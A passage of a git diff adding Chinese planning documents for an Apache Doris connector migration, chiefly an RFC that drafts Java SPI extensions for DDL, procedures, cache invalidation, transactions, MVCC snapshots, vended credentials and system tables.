| 风险 | 影响 | 缓解 | +|---|---|---|---| +| R1 | Image 反序列化兼容性回归(用户从旧 FE 升级) | High | 每次迁移加 image 兼容测试;保留 `gsonPostProcess` 迁移分支至少 2 个大版本 | +| R2 | Hive ACID 写路径在重构后数据不一致 | High | P7.3 必须有独立 ACID 集成测试套件作为 gate | +| R3 | Iceberg Procedure SPI 抽象失败(10 个 action 行为不齐) | Med | 先看 Trino Iceberg connector 怎么做的,再定 SPI 形态 | +| R4 | classloader 隔离打破 SDK 单例(Iceberg、Paimon、Trino)| Med | `ClassLoadingPolicy` 中 `parent-first` 列表必须覆盖所有共享 SDK 接口 | +| R5 | nereids 优化器对 `IcebergExternalTable` 的特殊规则不能用通用 SPI 表达 | Med | 在 P6.3 之前单独评审写路径方案;考虑给 ConnectorMetadata 暴露 hint API | +| R6 | 性能回归:每次访问通过 SPI 的反射/桥接增加额外开销 | Low | benchmark:1k 个 catalog × `listTableNames`、`getSchema` 路径基准;接受 < 5% 损失 | +| R7 | 部分 jar 在 BE / FE 间共享,连接器化后 FE 侧无法访问 | Low | `plugin-zip.xml` 的 exclude 列表要包含 BE 侧 jar;逐个 review | +| R8 | 用户文档与新插件部署流程不同步 | Low | P2 开始就同步写文档;P8 时整理为一份完整 admin guide | + +--- + +## 7. 交付物 + +1. 本计划 `plan-doc/00-connector-migration-master-plan.md`(v1)。 +2. 每个连接器一份 `plan-doc/--migration.md`,在进入对应阶段时撰写。 +3. P0 输出:`plan-doc/01-spi-extensions-rfc.md` —— SPI 新增能力的详细设计。 +4. P6 输出:`plan-doc/06-iceberg-write-path-rfc.md` —— Iceberg 写路径 SPI 化方案。 +5. P7 输出:`plan-doc/07-hms-event-pipeline-rfc.md` —— HMS event pipeline 放置 RFC。 +6. P8 输出:`fe/fe-connector/README.md` —— 用户/开发者最终使用手册。 + +--- + +## 8. 当前一周建议从哪开始 + +1. ✅ **已完成**:决策点 D1–D12 已于 2026-05-24 全部按推荐确认。 +2. 🚧 **进行中**:P0 RFC —— 见 `plan-doc/01-spi-extensions-rfc.md`,列出 §2.1 表里所有新增类型/方法的具体 Java 签名和 javadoc 草稿。 +3. **下一步**:P1 的重复清理 + scan-node 收口(无 SPI 风险、纯重构,可独立 PR)。 +4. **再下一步**:P2 trino-connector 全流程,把 playbook 跑通后再大规模铺开。 diff --git a/plan-doc/01-spi-extensions-rfc.md b/plan-doc/01-spi-extensions-rfc.md new file mode 100644 index 00000000000000..b9d43605c3ca1c --- /dev/null +++ b/plan-doc/01-spi-extensions-rfc.md @@ -0,0 +1,1248 @@ +# P0 — Connector SPI 扩展 RFC v1 + +> 状态:草案 v1 · 日期 2026-05-24 · 阶段 P0 · 主计划 [`00-connector-migration-master-plan.md`](./00-connector-migration-master-plan.md) +> 评审人:FE 平台组、各 connector owner +> 范围:列出后续 6 个 connector 迁移所需的全部新增 SPI 类型 / 方法 / 默认行为,给出 Java 签名草稿与影响面分析。 +> 不在范围:现有 SPI 的破坏性变更(D9 锁定 `apiVersion=1`)。 + +--- + +## 0. 摘要 + +| # | 扩展点 | 触发的迁移目标 | 入口包 | 影响阶段 | +|---|---|---|---|---| +| E1 | DDL Info / `ConnectorCreateTableRequest` | Hive、Iceberg、Paimon 的完整 CREATE TABLE | `connector.api.ddl` | P5/P6/P7 | +| E2 | Procedures / `ConnectorProcedureOps` | Iceberg 10 个 action | `connector.api.procedure` | P6 | +| E3 | Meta Invalidator / `ConnectorMetaInvalidator` | HMS event pipeline | `connector.spi` + `connector.api.events` | P7 | +| E4 | Transactions / `ConnectorTransaction` | Hive ACID、Iceberg、Paimon、MaxCompute | `connector.api`(扩展 `WriteOps`)| P5–P7 | +| E5 | MVCC Snapshot / `ConnectorMvccSnapshot` | Iceberg、Paimon | `connector.api.mvcc` | P5/P6 | +| E6 | Vended Credentials / `ConnectorCredentials` | Iceberg REST、Paimon REST、S3 Tables | `connector.api.scan` | P5/P6 | +| E7 | Sys Tables | Iceberg `$snapshots/$history/...`、Paimon | `connector.api`(扩展 `TableOps`)| P5/P6 | +| E8 | 列级 Statistics 写入 / `ConnectorColumnStatistics` | Hive ANALYZE | `connector.api.statistics`(扩展 `StatisticsOps`)| P7 | +| E9 | Delete / Merge sink 配置 | Iceberg DML | `connector.api.write`(扩展 `WriteConfig`/`WriteOps`)| P6 | +| E10 | Partition 列举 / `listPartitions` | MaxCompute、Paimon、Hive | `connector.api`(扩展 `TableOps`)| P4/P5/P7 | + +**总体不变量**: + +- 全部以 **default 方法**新增;现有 ES / JDBC 实现零修改。 +- `ConnectorProvider.apiVersion()` 保持 `1`;`ConnectorPluginManager.CURRENT_API_VERSION` 保持 `1`。 +- 任何新增类型不依赖 `org.apache.doris.{catalog,common,datasource,qe,analysis,nereids,planner}`。 +- 与已有类型有命名冲突时,**复用旧的**(如 `ConnectorPartitionInfo` 复用、`ConnectorWriteConfig` 扩展而非重建)。 + +--- + +## 1. 目标与范围 + +**做什么**:把主计划 §2.1 的 10 项 SPI 缺口逐一展开到"可以发起 PR 的 Java 签名级别"。每项列: + +1. 现状(旧实现锚点:fe-core 文件 + 关键调用方)。 +2. 设计签名(接口 / 类草稿,含 javadoc 关键句)。 +3. 默认行为(让旧 connector 零修改通过)。 +4. fe-core 侧 converter / 适配(如有)。 +5. 受影响连接器与验收标准。 + +**不做什么**:实现代码——本 RFC 只到接口和草稿层;实现在对应 Pn 阶段做。 + +--- + +## 2. 设计原则 + +### 2.1 向后兼容(核心) + +- 每个新增方法都是 `default`,旧 connector 不实现也能编译通过。 +- 默认行为分两类: + - **能力声明类**(`supports*` / `listSysTableTypes`)→ 返回空 / false。 + - **必须实现才有意义类**(`createTable(request)` / `callProcedure`)→ `throw new DorisConnectorException("xxx not supported")`,由 fe-core 在调用前用对应 `ConnectorCapability` 判断。 + +### 2.2 包结构(在现有基础上微调) + +``` +fe-connector-api/src/main/java/org/apache/doris/connector/api/ +├── (existing) Connector, ConnectorMetadata, ConnectorSession, ConnectorTableSchema, ... +├── ddl/ [NEW] ConnectorCreateTableRequest, ConnectorPartitionSpec, ConnectorBucketSpec +├── events/ [NEW] ConnectorMetaInvalidator ← 接口在 spi 包,类放 api 便于复用 +├── mvcc/ [NEW] ConnectorMvccSnapshot +├── procedure/ [NEW] ConnectorProcedureOps, ConnectorProcedureSpec, ConnectorProcedureArgument +├── statistics/ [NEW] ConnectorColumnStatistics ← ConnectorStatisticsOps 已在 api 包根 +├── pushdown/ (existing) +├── scan/ (existing) + [NEW] ConnectorCredentials +├── write/ (existing) + [NEW] ConnectorWriteType.DELETE / MERGE +└── handle/ (existing) + [NEW] ConnectorTransaction (replace placeholder) +``` + +`fe-connector-spi` 只新增一个 `ConnectorMetaInvalidator` 接口(放在 spi 包让 `ConnectorContext` 可以引用),其余都在 api。 + +### 2.3 命名一致性 + +- 接口名:`Connector*Ops` 表示一组操作(继承到 `ConnectorMetadata`),如 `ConnectorProcedureOps`。 +- 值对象:`Connector*` 名词(如 `ConnectorCreateTableRequest`、`ConnectorMvccSnapshot`)。 +- Handle:`Connector*Handle`(不可变标识 / opaque pointer)。 + +### 2.4 不在 SPI 暴露的东西 + +- Doris 内部类型:`Expr`、`Column`、`TableIf`、`CreateTableInfo`、`PartitionDesc` 等——fe-core 侧 converter 负责翻译。 +- 任何 `org.apache.doris.thrift.*` 类只在 `ConnectorScanRange.populateRangeParams` / `ConnectorMetadata.buildTableDescriptor` / `ConnectorScanPlanProvider.populateScanLevelParams` 三个已有入口暴露,新增 SPI 不引入更多 thrift 依赖。 + +--- + +## 3. 扩展点速查矩阵 + +| 扩展 | 新增类型 | 新增 / 扩展的方法(节选) | +|---|---|---| +| E1 | `ConnectorCreateTableRequest`、`ConnectorPartitionSpec`、`ConnectorBucketSpec` | `ConnectorTableOps.createTable(session, request)` | +| E2 | `ConnectorProcedureOps`、`ConnectorProcedureSpec`、`ConnectorProcedureArgument` | `ConnectorMetadata extends ConnectorProcedureOps` | +| E3 | `ConnectorMetaInvalidator`(spi 包接口) | `ConnectorContext.getMetaInvalidator()` | +| E4 | `ConnectorTransaction`(继承自旧的 `ConnectorTransactionHandle`) | `ConnectorWriteOps.beginTransaction(session)`、`commit/rollback` | +| E5 | `ConnectorMvccSnapshot` | `ConnectorMetadata.beginQuerySnapshot / getSnapshotAt / getSnapshotById` | +| E6 | `ConnectorCredentials` | `ConnectorScanPlanProvider.getCredentialsForScans(session, handle, ranges) → Map` | +| E7 | — | `ConnectorTableOps.listSysTableTypes(handle)` + 通过 `getTableHandle("tbl$snapshots")` 暴露 | +| E8 | `ConnectorColumnStatistics` | `ConnectorStatisticsOps.setColumnStatistics(...)` | +| E9 | `ConnectorWriteType.DELETE` / `MERGE_DELETE` / `MERGE_INSERT` 三个新枚举值 | `ConnectorWriteOps.getDeleteConfig / getMergeConfig` | +| E10 | — | `ConnectorTableOps.listPartitionNames` + `listPartitions(handle, filter)` | + +--- + +## 4. 扩展 E1:DDL Info / `ConnectorCreateTableRequest` + +### 4.1 现状 + +- `IcebergMetadataOps.createTable(CreateTableInfo)` 直接吃 nereids 的 `CreateTableInfo`(含 `ColumnDefinition`、`PartitionTableInfo`、`DistributionDescriptor`、`engine`、`properties`)。 +- `HiveMetadataOps.createTable(CreateTableInfo)` 同上。 +- 现有 SPI 的 `ConnectorTableOps.createTable(session, ConnectorTableSchema, Map)` **没有分区 / 分桶 / external / ifNotExists 概念**。 + +### 4.2 设计 + +```java +// connector.api.ddl.ConnectorCreateTableRequest +package org.apache.doris.connector.api.ddl; + +public final class ConnectorCreateTableRequest { + private final String dbName; + private final String tableName; + private final List columns; + private final ConnectorPartitionSpec partitionSpec; // nullable + private final ConnectorBucketSpec bucketSpec; // nullable + private final String comment; + private final Map properties; + private final boolean ifNotExists; + private final boolean external; // EXTERNAL TABLE + // builder + getters omitted +} + +public final class ConnectorPartitionSpec { + public enum Style { + IDENTITY, // Hive style: partition by col1, col2 + TRANSFORM, // Iceberg style: bucket(N, col) / truncate(N, col) / years(col) / ... + LIST, // Doris style: PARTITION BY LIST + RANGE, // Doris style: PARTITION BY RANGE + } + private final Style style; + private final List fields; + private final List initialValues; // for LIST/RANGE +} + +public final class ConnectorPartitionField { + private final String columnName; + private final String transform; // "identity" | "bucket" | "truncate" | "year" | "month" | "day" | "hour" + private final List transformArgs; // e.g., [16] for bucket(16, ...) +} + +public final class ConnectorBucketSpec { + private final List columns; + private final int numBuckets; + private final String algorithm; // "hive_hash" | "iceberg_bucket" | "doris_default" +} +``` + +### 4.3 在 `ConnectorTableOps` 新增 + +```java +public interface ConnectorTableOps { + // ... existing ... + + /** + * Creates a table with full DDL semantics (partition, bucket, external, IF NOT EXISTS). + * + *

Connectors should override this method when they support advanced CREATE TABLE + * options. The default implementation degrades to the legacy + * {@link #createTable(ConnectorSession, ConnectorTableSchema, Map)} for backward + * compatibility, dropping partition / bucket / external info.

+ * + * @throws DorisConnectorException if the connector cannot honor the request + */ + default void createTable(ConnectorSession session, + ConnectorCreateTableRequest request) { + ConnectorTableSchema schema = new ConnectorTableSchema( + request.getTableName(), request.getColumns(), + null, request.getProperties()); + createTable(session, schema, request.getProperties()); + } +} +``` + +### 4.4 fe-core 侧 converter + +新增 `fe/fe-core/src/main/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverter.java`: + +```java +public final class CreateTableInfoToConnectorRequestConverter { + public static ConnectorCreateTableRequest convert(CreateTableInfo info, + String dbName) { + return ConnectorCreateTableRequest.builder() + .dbName(dbName) + .tableName(info.getTableNameInfo().getTbl()) + .columns(convertColumns(info.getColumns())) + .partitionSpec(convertPartition(info.getPartitionTableInfo())) + .bucketSpec(convertBucket(info.getDistributionDesc())) + .comment(info.getComment()) + .properties(info.getProperties()) + .ifNotExists(info.isIfNotExists()) + .external(info.isExternal()) + .build(); + } + // ... convertColumns / convertPartition / convertBucket +} +``` + +`PluginDrivenExternalCatalog` 不需要改——CREATE TABLE 经由 `ExternalCatalog.createTable(...)` 入口,新加一段: + +```java +public class PluginDrivenExternalCatalog extends ExternalCatalog { + @Override + public boolean createTable(CreateTableStmt stmt) throws UserException { + ConnectorSession s = buildConnectorSession(); + ConnectorCreateTableRequest req = CreateTableInfoToConnectorRequestConverter + .convert(stmt.getCreateTableInfo(), stmt.getDbName()); + connector.getMetadata(s).createTable(s, req); + return true; + } +} +``` + +### 4.5 影响的连接器 + +| 连接器 | 必须实现 | 备注 | +|---|---|---| +| Hive | 是 | 当前 fe-core 用 `CreateTableInfo` 直接构造 Hive table,要还原全部分区 / 分桶逻辑 | +| Iceberg | 是 | Iceberg transform spec 是最复杂的,已是 connector 化重点 | +| Paimon | 是 | bucket spec 必须 | +| JDBC | 不需要 | 已经在用旧 createTable,无 partition / bucket 需求 | +| ES | 不需要 | 不支持 CREATE TABLE | +| 其他(MaxCompute/Trino/Hudi)| 取决于是否支持 CREATE TABLE | MaxCompute 支持 partition;Trino-connector 透传;Hudi 不支持 | + +### 4.6 验收标准 + +- `mvn -pl fe-connector-api compile` 通过。 +- 一个测试 connector(在 `fe-connector-api/src/test`)只用旧 `createTable(session, schema, props)` 也能编译。 +- fe-core `CreateTableInfoToConnectorRequestConverter` 单测覆盖 Hive 风格 / Iceberg transform / List partition 三种来源。 + +--- + +## 5. 扩展 E2:Procedures / `ConnectorProcedureOps` + +### 5.1 现状 + +- `fe/fe-core/src/main/java/org/apache/doris/datasource/iceberg/action/BaseIcebergAction.java` 抽象基类。 +- 10 个子类:`IcebergCherrypickSnapshotAction`、`IcebergExpireSnapshotsAction`、`IcebergFastForwardAction`、`IcebergPublishChangesAction`、`IcebergRewriteDataFilesAction`、`IcebergRewriteManifestsAction`、`IcebergRollbackToSnapshotAction`、`IcebergRollbackToTimestampAction`、`IcebergSetCurrentSnapshotAction`。 +- `IcebergExecuteActionFactory` 按 procedure 名 dispatch。 +- 入口:`CALL iceberg.system.rewrite_data_files(...)` 之类语法 → nereids `ExecuteCommand` → `ExternalCatalog.executeAction(...)`(当前是 `IcebergExternalCatalog` 实现)。 + +### 5.2 设计 + +```java +// connector.api.procedure.ConnectorProcedureOps +package org.apache.doris.connector.api.procedure; + +public interface ConnectorProcedureOps { + + /** + * Lists all procedures this connector exposes. + * + *

Lifecycle contract (U1): the returned set MUST be stable across + * the connector instance's lifetime. fe-core may cache this list, and changes + * in the external system (e.g., a server-side plugin install) will only be + * visible after the catalog is dropped and re-created.

+ */ + default List listProcedures() { + return Collections.emptyList(); + } + + /** + * Executes a named procedure with bound arguments. + * + *

Argument values follow the {@link ConnectorType} system: + * boxed primitives, {@link String}, {@link java.time.Instant}, {@link java.util.List}, {@link Map}.

+ * + * @param session connector session + * @param procedureName fully qualified procedure name (e.g., "rewrite_data_files") + * @param arguments name → bound value + * @return procedure-specific result map (e.g., "rewritten_data_files_count" → 42) + * @throws DorisConnectorException if the procedure name is unknown or args are invalid + */ + default Map callProcedure(ConnectorSession session, + String procedureName, Map arguments) { + throw new DorisConnectorException( + "Procedure not supported: " + procedureName); + } +} + +public final class ConnectorProcedureSpec { + private final String name; + private final String description; + private final List arguments; + // builder + getters +} + +public final class ConnectorProcedureArgument { + private final String name; + private final ConnectorType type; + private final boolean required; + private final Object defaultValue; // boxed, may be null + // builder + getters +} +``` + +### 5.3 在 `ConnectorMetadata` 加入 super interface + +```java +public interface ConnectorMetadata extends + ConnectorSchemaOps, + ConnectorTableOps, + ConnectorPushdownOps, + ConnectorStatisticsOps, + ConnectorWriteOps, + ConnectorIdentifierOps, + ConnectorProcedureOps, // [NEW] + Closeable { ... } +``` + +### 5.4 fe-core 侧适配 + +把 `ExecuteCommand`(nereids)改为: + +```java +public class ExecuteCommand extends Command { + public void run(ConnectContext ctx) { + ExternalCatalog cat = ...; + if (cat instanceof PluginDrivenExternalCatalog) { + PluginDrivenExternalCatalog pdc = (PluginDrivenExternalCatalog) cat; + ConnectorSession s = pdc.buildConnectorSession(); + Map result = pdc.getConnector() + .getMetadata(s) + .callProcedure(s, procedureName, argsMap); + displayResult(result); + return; + } + // legacy path (kept until P6 completes) + } +} +``` + +`IcebergConnectorMetadata.callProcedure` 内部走原 `BaseIcebergAction` 的 10 个子类实现(搬到 connector 内)。 + +### 5.5 影响连接器 + +- Iceberg(必须,10 procedure)。 +- Paimon(可选,未来可加 expire-snapshots 等)。 +- 其他连接器:不实现。 + +### 5.6 验收标准 + +- 默认行为:未实现 procedure 的 connector 调用时抛清晰错误,不导致 NPE。 +- `ConnectorProcedureSpec` 通过 `Connector.getMetadata(...).listProcedures()` 暴露,可被 `SHOW PROCEDURES FROM ` 列出(**附:** 是否需要这条 SQL 也加 SPI 入口?建议留到 P6 评估)。 + +--- + +## 6. 扩展 E3:Meta Invalidator / `ConnectorMetaInvalidator` + +### 6.1 现状 + +- `fe/fe-core/src/main/java/org/apache/doris/datasource/hive/event/MetastoreEventsProcessor.java` 是后台线程。 +- 21 个 `MetastoreEvent` 子类(`CreateTableEvent`、`AlterPartitionEvent`、`InsertEvent`...)封装 HMS `NotificationEvent`。 +- 事件处理流:HMS API → `EventFactory` → 解析为 `MetastoreEvent` → `event.process()` → 调 fe-core `ExternalMetaCacheMgr.invalidateTableCache(...)`。 + +### 6.2 设计(D4:把 event 流程整体搬到 fe-connector-hms) + +```java +// connector.spi.ConnectorMetaInvalidator ← 放 spi 包,让 ConnectorContext 可引用 +package org.apache.doris.connector.spi; + +public interface ConnectorMetaInvalidator { + + ConnectorMetaInvalidator NOOP = new ConnectorMetaInvalidator() { }; + + /** Invalidates the entire catalog's metadata caches. */ + default void invalidateAll() { } + + /** Invalidates cached metadata for one database. */ + default void invalidateDatabase(String dbName) { } + + /** Invalidates cached metadata for one table. */ + default void invalidateTable(String dbName, String tableName) { } + + /** + * Invalidates cached partition info for one partition. + * @param partitionValues partition column values in declared order (e.g., ["2024", "01"]) + */ + default void invalidatePartition(String dbName, String tableName, + List partitionValues) { } + + /** Invalidates cached statistics for one table (without dropping schema cache). */ + default void invalidateStatistics(String dbName, String tableName) { } +} +``` + +### 6.3 在 `ConnectorContext` 暴露 + +```java +public interface ConnectorContext { + // ... existing ... + + /** + * Returns the meta invalidator that the connector can call to notify + * the engine of external metadata changes (e.g., from HMS notification events). + */ + default ConnectorMetaInvalidator getMetaInvalidator() { + return ConnectorMetaInvalidator.NOOP; + } +} +``` + +### 6.4 fe-core 侧实现 + +`DefaultConnectorContext` 提供基于 `ExternalMetaCacheMgr` + 当前 catalogId 的实例: + +```java +public class DefaultConnectorContext implements ConnectorContext { + @Override + public ConnectorMetaInvalidator getMetaInvalidator() { + return new ExternalMetaCacheInvalidator(this.catalogId); + } +} + +// fe/fe-core/.../connector/ExternalMetaCacheInvalidator.java [NEW] +public class ExternalMetaCacheInvalidator implements ConnectorMetaInvalidator { + private final long catalogId; + public ExternalMetaCacheInvalidator(long catalogId) { this.catalogId = catalogId; } + + @Override + public void invalidateTable(String dbName, String tableName) { + Env.getCurrentEnv().getExtMetaCacheMgr() + .invalidateTableCache(catalogId, dbName, tableName); + } + // ... other methods delegate to ExternalMetaCacheMgr +} +``` + +### 6.5 fe-connector-hms 侧迁移 + +整体 move: + +``` +mv fe/fe-core/src/main/java/org/apache/doris/datasource/hive/event/* + fe/fe-connector/fe-connector-hms/src/main/java/org/apache/doris/connector/hms/events/ +``` + +`MetastoreEventsProcessor` 的构造参数从 `HMSExternalCatalog` 改为 `(HmsClient, ConnectorMetaInvalidator)`。每个 event 类 `process()` 改为调 `invalidator.invalidateXxx`,而不是 fe-core 的 `ExternalMetaCacheMgr`。 + +启动:`HiveConnector` 在 `create(...)` 时启动一个 `MetastoreEventsProcessor` 后台线程;`close()` 时停掉。 + +### 6.6 影响 + +- 仅 Hive / HMS(其它 connector 不需要 event)。 +- fe-core `ExternalMetaCacheMgr` API 表面不变;只是被调用方从 `MetastoreEventsProcessor` 变为 `ExternalMetaCacheInvalidator`。 + +### 6.7 验收标准 + +- `fe-connector-hms` 不再 import 任何 `org.apache.doris.datasource.*`。 +- 现有的 HMS event 集成测试(如果有)继续通过。 +- 在没有 event listener 的连接器上,`ConnectorContext.getMetaInvalidator()` 返回 NOOP,无任何后台线程开销。 + +--- + +## 7. 扩展 E4:Transactions / `ConnectorTransaction` + +### 7.1 现状 + +- `fe/fe-core/.../transaction/TransactionManagerFactory.java` 按 catalog 类型 switch: + - HMS → `HiveTransactionManager`(包 `HiveTransactionMgr`,包 `HMSTransaction`) + - Iceberg → `IcebergTransactionManager`(包 `IcebergTransaction`) + - PluginDriven → `PluginDrivenTransactionManager`(占位) +- 每个 `*Transaction` 类持有 commit/rollback 状态:snapshot id、staged files、partition adds 等。 + +### 7.2 设计 + +将占位的 `ConnectorTransactionHandle`(24 行的空接口)扩展为可用的 `ConnectorTransaction`: + +```java +// connector.api.handle.ConnectorTransaction ← 同包替换占位 +package org.apache.doris.connector.api.handle; + +public interface ConnectorTransaction extends ConnectorTransactionHandle, Closeable { + + /** Stable transaction ID assigned by the connector. */ + long getTransactionId(); + + /** + * Commits all pending operations bound to this transaction. + * + * @throws DorisConnectorException on conflict / IO failure / external system error + */ + void commit(); + + /** + * Aborts all pending operations and releases resources. + * Safe to call multiple times; subsequent calls are no-ops. + */ + void rollback(); + + /** Called by the engine after commit OR rollback to release connections etc. */ + @Override + void close(); +} +``` + +### 7.3 在 `ConnectorWriteOps` 扩展 + +```java +public interface ConnectorWriteOps { + // ... existing beginInsert/finishInsert/abortInsert/beginDelete/... ... + + /** + * Begins a new transaction scoped to a single SQL statement (auto-commit) or to + * an explicit BEGIN..COMMIT block. The returned transaction is passed to subsequent + * begin* / finish* / abort* calls via the same {@link ConnectorSession}. + * + *

Connectors that do not support multi-statement transactions can either:

+ *
    + *
  • Return a no-op transaction whose commit/rollback do nothing.
  • + *
  • Throw, in which case the engine treats every statement as auto-commit.
  • + *
+ */ + default ConnectorTransaction beginTransaction(ConnectorSession session) { + throw new DorisConnectorException("Transactions not supported"); + } +} +``` + +### 7.4 fe-core 侧改造 + +`PluginDrivenTransactionManager` 改为通用: + +```java +public class PluginDrivenTransactionManager implements TransactionManager { + private final Map active = new ConcurrentHashMap<>(); + + public ConnectorTransaction begin(Connector c, ConnectorSession s) { + ConnectorTransaction tx = c.getMetadata(s).beginTransaction(s); + active.put(tx.getTransactionId(), tx); + return tx; + } + + @Override + public void commit(long txId) { + ConnectorTransaction tx = active.remove(txId); + if (tx != null) { tx.commit(); tx.close(); } + } + + @Override + public void rollback(long txId) { + ConnectorTransaction tx = active.remove(txId); + if (tx != null) { tx.rollback(); tx.close(); } + } +} +``` + +`TransactionManagerFactory` 在 P7/P8 删除 HMS / Iceberg 分支,只留 PluginDriven 一种。 + +### 7.5 影响 + +- Hive、Iceberg、Paimon、MaxCompute(4 个有事务的连接器)。 +- JDBC、ES、Trino-connector:返回 no-op transaction 或抛 unsupported。 + +### 7.6 与旧 `beginInsert` 的关系 + +旧 `beginInsert(session, handle, columns) -> ConnectorInsertHandle` 不变;新增的 `beginTransaction` 是"包含 begin/end 的更高阶事务"。连接器有两种用法: + +1. **简单**:不实现 `beginTransaction`,每次 `beginInsert` 内部自管事务(适合 JDBC)。 +2. **复杂**:实现 `beginTransaction`,`beginInsert` 内部把 work 挂到当前 `ConnectorSession` 关联的事务上(适合 Iceberg / Hive ACID)。 + +`ConnectorSession` 新增可选字段: + +```java +public interface ConnectorSession { + // ... existing ... + default Optional getCurrentTransaction() { + return Optional.empty(); + } +} +``` + +fe-core 用 `ConnectorSessionImpl` 在事务期间填入。 + +### 7.7 验收标准 + +- 已有 JDBC 测试(auto-commit)继续通过。 +- 新增一个 mock 事务 connector 测试 BEGIN/COMMIT 路径。 + +--- + +## 8. 扩展 E5:MVCC Snapshot / `ConnectorMvccSnapshot` + +### 8.1 现状 + +- `fe/fe-core/.../iceberg/IcebergMvccSnapshot.java` 包装 Iceberg snapshot id + timestamp。 +- `fe/fe-core/.../paimon/PaimonMvccSnapshot.java` 同上。 +- 调用方:nereids `MvccSnapshot` 接口在分析阶段查询 snapshot;scan plan 使用 snapshot id。 + +### 8.2 设计 + +```java +// connector.api.mvcc.ConnectorMvccSnapshot +package org.apache.doris.connector.api.mvcc; + +public final class ConnectorMvccSnapshot { + private final long snapshotId; + private final long timestampMillis; + private final String description; + private final Map properties; // connector-specific metadata + // builder + getters +} +``` + +### 8.3 在 `ConnectorMetadata` 新增 + +```java +public interface ConnectorMetadata extends ... { + + /** + * Returns the current snapshot at query begin time, used as the MVCC pin for + * all subsequent reads of {@code handle}. Returning {@link Optional#empty()} + * means the connector does not support MVCC and reads see whatever is current. + */ + default Optional beginQuerySnapshot( + ConnectorSession session, ConnectorTableHandle handle) { + return Optional.empty(); + } + + /** Returns the snapshot at the given wall-clock time, or empty if none. */ + default Optional getSnapshotAt( + ConnectorSession session, ConnectorTableHandle handle, + long timestampMillis) { + return Optional.empty(); + } + + /** Returns the snapshot with the given id, or empty if none. */ + default Optional getSnapshotById( + ConnectorSession session, ConnectorTableHandle handle, + long snapshotId) { + return Optional.empty(); + } +} +``` + +### 8.4 fe-core 侧 + +新增 `ConnectorMvccSnapshotAdapter` 实现 fe-core 的 `MvccSnapshot` 接口,包 `ConnectorMvccSnapshot`。`PluginDrivenExternalTable` 在 `getMvccSnapshot(...)` 中返回 adapter 实例。 + +### 8.5 影响 + +- Iceberg、Paimon 必须实现。 +- Hudi 可选(incremental query 时序)。 +- 其他 connector 默认返回 `Optional.empty()`,fe-core 退化到非 MVCC 读。 + +### 8.6 验收标准 + +- Iceberg / Paimon connector 实现后能传 snapshot id 到 BE。 +- `SELECT * FROM tbl FOR VERSION AS OF 123` / `FOR TIMESTAMP AS OF '...'` 路径走通。 + +--- + +## 9. 扩展 E6:Vended Credentials / `ConnectorCredentials` + +### 9.1 现状 + +- `fe/fe-core/.../iceberg/IcebergVendedCredentialsProvider.java`、`PaimonVendedCredentialsProvider.java` 在 fe-core 通过 `instanceof` 探测,再调 connector 的 REST catalog 拿 STS 凭证。 +- 凭证传给 BE:嵌在 `TFileScanRangeParams.location_properties` 里。 +- `ConnectorCapability.SUPPORTS_VENDED_CREDENTIALS` 已存在。 + +### 9.2 设计 + +```java +// connector.api.scan.ConnectorCredentials +package org.apache.doris.connector.api.scan; + +public final class ConnectorCredentials { + private final Map credentials; // e.g., aws_access_key / aws_secret_key / session_token + private final long expiryEpochMillis; // -1 = no expiry + // builder + getters +} +``` + +### 9.3 在 `ConnectorScanPlanProvider` 新增 + +```java +public interface ConnectorScanPlanProvider { + // ... existing ... + + /** + * Returns short-lived credentials for a batch of scan ranges in a single call. + * + *

Batch semantics let the connector amortize STS / vending API calls:

+ *
    + *
  • One STS call for all ranges → return a {@link Map} that maps every range + * to the same {@link ConnectorCredentials} instance.
  • + *
  • Group ranges by location prefix (e.g., S3 bucket / prefix) → return a + * map where ranges in the same group share an instance.
  • + *
  • One credential per range → return a map with distinct instances per key.
  • + *
+ * + *

The returned map's keys must be a subset of {@code scanRanges}; any range + * not present in the map will scan without vended credentials (the engine falls + * back to the catalog-level filesystem properties).

+ * + *

Connectors that do not vend credentials should return + * {@link Collections#emptyMap()} (the default).

+ * + * @param session current session + * @param handle the table being scanned + * @param scanRanges all ranges produced by {@link #planScan} for this scan node + * @return per-range credentials map (instances may be shared across keys) + */ + default Map getCredentialsForScans( + ConnectorSession session, + ConnectorTableHandle handle, + List scanRanges) { + return Collections.emptyMap(); + } +} +``` + +### 9.4 fe-core 侧 + +`PluginDrivenScanNode` 在 `createScanRangeLocations()` 完成后、`setScanParams` 之前做一次批量调用并缓存结果: + +```java +public class PluginDrivenScanNode extends FileQueryScanNode { + // ... existing fields ... + private Map cachedCredentials; + + @Override + public void createScanRangeLocations() throws UserException { + super.createScanRangeLocations(); + + if (connector.getCapabilities().contains(ConnectorCapability.SUPPORTS_VENDED_CREDENTIALS)) { + List ranges = collectScanRanges(); // already on hand from getSplits() + cachedCredentials = scanProvider.getCredentialsForScans( + connectorSession, currentHandle, ranges); + } + // ... existing populateScanLevelParams etc. + } + + @Override + protected void setScanParams(TFileRangeDesc rangeDesc, Split split) { + // ... existing tableFormatFileDesc construction ... + if (cachedCredentials != null) { + ConnectorScanRange range = ((PluginDrivenSplit) split).getConnectorScanRange(); + ConnectorCredentials c = cachedCredentials.get(range); // null = no vended creds for this range + if (c != null) { + mergeIntoLocationProps(rangeDesc, c.getCredentials()); + } + } + } +} +``` + +**关键不变量**: +- `getCredentialsForScans` 在一个 scan node 生命周期内只被调用一次。 +- 返回 map 的 value 可以共享实例 —— 单次 STS call、N 个 range 同一组凭证是常态而非例外。 +- 返回 map 的 key 是输入 list 的子集 —— 缺失的 range 退化到 catalog-level FS properties,**不报错**。 + +### 9.5 影响 + +- Iceberg REST catalog、Paimon REST catalog、S3 Tables。 +- 其他 connector 不实现。 + +### 9.6 验收标准 + +- Iceberg REST + S3 vended path 跑通查询。 +- 凭证不出现在 EXPLAIN / SHOW CREATE 输出(mask test)。 +- **STS 调用频次回归**:一个 scan node 不论 split 数量多少,对外只触发 1 次 STS 调用(除非连接器主动按 prefix 分组)。在 `IcebergConnectorMetadataTest` 或同级集成测试里加 mock STS 计数器断言。 + +--- + +## 10. 扩展 E7:Sys Tables + +### 10.1 现状 + +- `IcebergSysExternalTable.SysTableType` 枚举(`HISTORY`、`SNAPSHOTS`、`FILES`、`MANIFESTS`、`PARTITIONS`、`POSITION_DELETES`、`ALL_DATA_FILES`、`ALL_MANIFESTS`、`ENTRIES`)。 +- `PaimonSysExternalTable` 类似。 +- 引用方式:`SELECT * FROM iceberg_cat.db.tbl$snapshots`。 + +### 10.2 设计(**不引入新类型**,复用 `ConnectorTableHandle`) + +把 sys-table 